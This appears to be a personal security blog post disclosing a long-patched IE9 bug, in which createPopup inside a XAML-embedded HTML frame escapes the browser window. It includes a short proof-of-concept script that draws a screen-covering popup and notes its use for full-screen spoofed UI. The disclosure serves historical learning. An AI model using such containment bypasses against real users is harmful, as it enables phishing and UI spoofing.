IE9: createPopup Inside a XAML Frame Covers the Entire Screen

This was a UI containment issue. A createPopup created from inside an HTML frame embedded in a XAML document is not constrained to the browser window — it can be sized to cover the entire screen. This bypasses the expected visual containment that should prevent web content from obscuring OS chrome or other applications.

<!-- html_inside_xaml_createpopup_outside_browser_limits.html -->
<script language="Javascript">
window.onload = function()
{
    var a = createPopup();
    a.document.bgColor = '#548FC0';
    a.document.body.innerHTML = '<h1>HELLO!</h1><br /><br /><br />This is a classic <b>createPopup() <font color="red">inside a Frame</font></b> of a XAML file...';
    a.show(0, 0, 2000, 2000);
}
</script>

The XAML host (index.xaml) embeds this HTML page as a Frame element. Because the XAML rendering surface is not subject to the same popup-size restrictions as a regular browser window, the createPopup can claim dimensions well beyond the screen bounds. This could be used to present convincing full-screen spoofed UI without any browser chrome being visible.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 EoP: Execute Window Method After the Page Has Navigated Away] :: [IE9 EoP: Arbitrary Code Execution via Internal InsertImage Dialog] >